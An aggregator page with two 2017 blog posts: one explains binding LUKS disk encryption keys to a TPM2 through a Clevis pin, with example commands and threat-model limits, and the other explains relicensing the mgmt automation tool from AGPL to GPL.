So the first TPM feature we want to add to Fedora (and likely one of the most common use cases for a TPM) is the ability to bind a LUKS volume master key to a TPM2. That way the volume can be automatically unlocked (without typing a pass-phrase) by using the TPM2 to obtain the master key.

A key point here is that the actual LUKS master key is not present in plain text form on the system, it is protected by TPM encryption.

Also, by sealing the LUKS master key with a specific set of Platform Configuration Registers (PCR), one can make sure that the volume will only be unlocked if the system has not been tampered with. For example (as explained in this post), PCR7 is used to measure the UEFI Secure Boot policy and keys. So the LUKS master key can be sealed against this PCR, to avoid unsealing it if Secure Boot was disabled or the used keys were replaced.

Implementation details: Clevis

Clevis is a plugable framework for automated decryption that has a number of "pins", where each pin implements an {en,de}cryption support using a different backend. It also has a command line interface to {en,de}crypt data using these pins, create complex security policies and bind a pin to a LUKS volume to later unlock it.

Clevis relies on the José project, which is an C implementation of the Javascript Object Signing and Encryption (JOSE) standard. It also uses the LUKSMeta project to store a Clevis pin metadata in a LUKS volume header.

On encryption, a Clevis pin takes some data to encrypt and a JSON configuration to produce a JSON Web Encryption (JWE) content. This JWE has the data encrypted using a JSON Web KEY (JWK) and information on how to obtain the JWK for decryption.

On decryption, the Clevis pin obtains a JWK using the information provided by a JWE and decrypts the ciphertext also stored in the JWE using that key.

Each Clevis pin defines their own JSON configuration format, how the JWK is created, where is stored and how to retrieve it.

As mentioned, Clevis has support to bind a pin with a LUKS volume. This means that a LUKS master key is encrypted using a pin and the resulting JWE is stored in a LUKS volume meta header. That way Clevis is able to later decrypt the master key and unlock the LUKS volume. Clevis has dracut and udisks2 support to do this automatically and the next version of Clevis will also include a command line tool to unlock non-root (data) volumes.

Clevis TPM2 pin

Clevis provides a mechanism to automatically supply the LUKS master key for the root volume. The initial implementation of Clevis has support to obtain the LUKS master key from a network service, but we have extended Clevis to take advantage of a TPM2 chip, which is available on most servers, desktops and laptops.

By using a TPM, the disk can only be unlocked on a specific system - the disk will neither boot nor be accessed on another machine.

This implementation also works with UEFI Secure Boot, which will prevent the system from being booted if the firmware or system configuration has been modified or tampered with.

To make use of all the Clevis infrastructure and also be able to use the TPM2 as a part of more complex security policies, the TPM2 support was implemented as a clevis tpm2 pin.

On encryption the tpm2 pin generates a JWK, creates an object in the TPM2 with the JWK as sensitive data and binds the object (or seals if a PCR set is defined in the JSON configuration) to the TPM2.

The generated JWE contains both the public and wrapped sensitive portions of the created object, as well as information on how to unseal it from the TPM2 (hashing and key encryption algorithms used to recalculate the primary key, PCR policy for authentication, etc).

On decryption the tpm2 pin takes the JWE that contains both the sealed object and information on how to unseal it, loads the object into the TPM2 by using the public and wrapped sensitive portions and unseals the JWK to decrypt the ciphertext stored in the JWE.

The changes haven't been merged yet, since the pin is using features from tpm2-tools master so we have to wait for the next release of the tools. And also there are still discussions on the pull request about some details, but it should be ready to land soon.


The Clevis command line tools can be used to encrypt and decrypt data using a TPM2 chip. The tpm2 pin has reasonable defaults but one can configure most of its parameters using the pin JSON configuration (refer to the Clevis tpm2 pin documentation for these), e.g:

$ echo foo | clevis encrypt tpm2 '{}' > secret.jwe

And then the data can later be decrypted with:

$ clevis decrypt < secret.jwe

To seal data against a set of PCRs:

$ echo foo | clevis encrypt tpm2 '{"pcr_ids":"8,9"}' > secret.jwe

And to bind a tpm2 pin to a LUKS volume:

$ clevis luks bind -d /dev/sda3 tpm2 '{"pcr_ids":"7"}'

The LUKS master key is not stored in raw format, but instead is wrapped with a JWK that has the same entropy than the LUKS master key. It's this JWK that is sealed with the TPM2.

Since Clevis has both dracut and udisks2 hooks, the command above is enough to have the LUKS volume be automatically unlocked using the TPM2.

The next version of Clevis also has a clevis-luks-unlock command line tool, so a LUKS volume could be manually unlocked with:

$ clevis luks unlock -d /dev/sda3

Using the TPM2 as a part of more complex security policies

One of Clevis supported pins is the Shamir Shared Secret (SSS) pin, that allows to encrypt a secret using a JWK that is then split into different parts. Each part is then encrypted using another pin and a threshold is chose to decide how many parts are needed to reconstruct the encryption key, so the secret can be decrypted.

This allows for example to split the JWK used to wrap the LUKS mater key in two parts. One part of the JWK could be sealed with the TPM2 and another part be stored in a remote server. By sealing a JWK that's only one part of the needed key to decrypt the LUKS master key, an attacker obtaining the data sealed in the TPM won't be able to unlock the LUKS volume.

The Clevis encrypt command for this particular example would be:

$ clevis luks bind -d /dev/sda3 sss '{"t": 2, "pins": \
  {"http":{"url":"http://server.local/key"}, "tpm2": \

Limitations of this approach

One problem with the current implementation is that Clevis is a user-space tool and so it can't be used to unlock a LUKS volume that has an encrypted /boot directory. The boot partition still needs to remain unencrypted so the bootloader is able to load a Linux kernel and an initramfs that contains Clevis, to unlock the encrypted LUKS volume for the root partition.

Since the initramfs is not signed on a Secure Boot setup, an attacker could replace the initramfs and unlock the LUKS volume. So the threat model meant to protect is for an attacker that can get access to the encrypted volume but not to the trusted machine.

There are different approaches to solve this limitation. The previously mentioned post from Matthew Garret suggests to have a small initramfs that's built into the signed Linux kernel. The only task for this built-in initramfs would be to unseal the LUKS master key, store it into the kernel keyring and extend PCR7 so the key can't be unsealed again. Later the usual initramfs can unlock the LUKS volume by using the key already stored in the Linux kernel.

Another approach is to also have the /boot directory in an encrypted LUKS volume and provide support for the bootloader to unseal the master key with the TPM2, for example by supporting the same JWE format in the LUKS meta header used by Clevis. That way only a signed bootloader would be able to unlock the LUKS volume that contains /boot, so an attacker won't be able to tamper the system by replacing the initramfs since it will be in an encrypted partition.

But there is work to be done for both approaches, so it will take some time until we have protection for this threat model.

Still, having an encrypted root partition that is only automatically unlocked on a trusted machine has many use cases. To list a few examples:


I would like to thanks Nathaniel McCallum and Russell Doty for their feedback and suggestions for this article.

18 Oct 2017 8:59am GMT

James Just James: Copyleft is Dead. Long live Copyleft!

As you may have noticed, we recently re-licensed mgmt from the AGPL (Affero General Public License) to the regular GPL. This is a post explaining the decision and which hopefully includes some insights at the intersection of technology and legal issues.


I am not a lawyer, and these are not necessarily the opinions of my employer. I think I'm knowledgeable in this area, but I'm happy to be corrected in the comments. I'm friends with a number of lawyers, and they like to include disclaimer sections, so I'll include this so that I blend in better.


It's well understood in infrastructure coding that the control of, and trust in the software is paramount. It can be risky basing your business off of a product if the vendor has the ultimate ability to change the behaviour, discontinue the software, make it prohibitively expensive, or in the extreme case, use it as a backdoor for corporate espionage.

While many businesses have realized this, it's unfortunate that many individuals have not. The difference might be protecting corporate secrets vs. individual freedoms, but that's a discussion for another time. I use Fedora and GNOME, and don't have any Apple products, but you might value the temporary convenience more. I also support your personal choice to use the software you want. (Not sarcasm.)

This is one reason why Red Hat has done so well. If they ever mistreated their customers, they'd be able to fork and grow new communities. The lack of an asymmetrical power dynamic keeps customers feeling safe and happy!

Section 13:

The main difference between the AGPL and the GPL is the "Remote Network Interaction" section. Here's a simplified explanation:

Both licenses require that if you modify the code, you give back your contributions. "Copyleft" is Copyright law that legally requires this share-alike provision. These licenses never require this when using the software privately, whether as an individual or within a company. The thing that "activates" the licenses is distribution. If you sell or give someone a modified copy of the program, then you must also include the source code.

The AGPL extends the GPL in that it also activates the license if that software runs on a application providers computer which is common with hosted software-as-a-service. In other words, if you were an external user of a web calendaring solution containing AGPL software, then that provider would have to offer up the code to the application, whereas the GPL would not require this, and neither license would require distribution of code if the application was only available to employees of that company nor would it require distribution of the software used to deploy the calendaring software.

Network Effects and Configuration Management:

If you're familiar with the infrastructure automation space, you're probably already aware of three interesting facts:

  1. Hosted configuration management as a service probably isn't plausible
  2. The infrastructure automation your product uses isn't the product
  3. Copyleft does not apply to the code or declarations that describe your configuration

As a result of this, it's unlikely that the Section 13 requirement of the AGPL would actually ever apply to anyone using mgmt!

A number of high profile organizations outright forbid the use of the AGPL. Google and Openstack are two notable examples. There are others. Many claim this is because the cost of legal compliance is high. One argument I heard is that it's because they live in fear that their entire proprietary software development business would be turned on its head if some sufficiently important library was AGPL. Despite weak enforcement, and with many companies flouting the GPL, Linux and the software industry have not shown signs of waning. Compliance has even helped their bottom line.

Nevertheless, as a result of misunderstanding, fear and doubt, using the AGPL still cuts off a portion of your potential contributors. Possible overzealous enforcing has also probably caused some to fear the GPL.

Foundations and Permissive Licensing:

Why use copyleft at all? Copyleft is an inexpensive way of keeping the various contributors honest. It provides an organization constitution so that community members that invest in the project all get a fair, representative stake.

In the corporate world, there is a lot of governance in the form of "foundations". The most well-known ones exist in the United States and are usually classified as 501(c)(6) under US Federal tax law. They aren't allowed to generate a profit, but they exist to fulfill the desires of their dues-paying membership. You've probably heard of the Linux Foundation, the .NET foundation, the OpenStack Foundation, and the recent Linux Foundation child, the CNCF. With the major exception being Linux, they primarily fund permissively licensed projects since that's what their members demand, and the foundation probably also helps convince some percentage of their membership into voluntarily contributing back code.

Running an organization like this is possible, but it certainly adds a layer of overhead that I don't think is necessary for mgmt at this point.

It's also interesting to note that of the top corporate contributions to open source, virtually all of the licensing is permissive, usually under the Apache v2 license. I'm not against using or contributing to permissively licensed projects, but I do think there's a danger if most of our software becomes a monoculture of non-copyleft, and I wanted to take a stand against that trend.


I started mgmt to show that there was still innovation to be done in the automation space, and I think I've achieved that. I still have more to prove, but I think I'm on the right path. I also wanted to innovate in licensing by showing that the AGPL isn't actually harmful. I'm sad to say that I've lost that battle, and that maybe it was too hard to innovate in too many different places simultaneously.

Red Hat has been my main source of funding for this work up until now, and I'm grateful for that, but I'm sad to say that they've officially set my time quota to zero. Without their support, I just don't have the energy to innovate in both areas. I'm sad to say it, but I'm more interested in the technical advancements than I am in the licensing progress it might have brought to our software ecosystem.

Conclusion / TL;DR:

If you, your organization, or someone you know would like to help fund my mgmt work either via a development grant, contract or offer of employment, or if you'd like to be a contributor to the project, please let me know! Without your support, mgmt will die.

Happy Hacking,


You can follow James on Twitter for more frequent updates and other random noise.

18 Oct 2017 1:22am GMT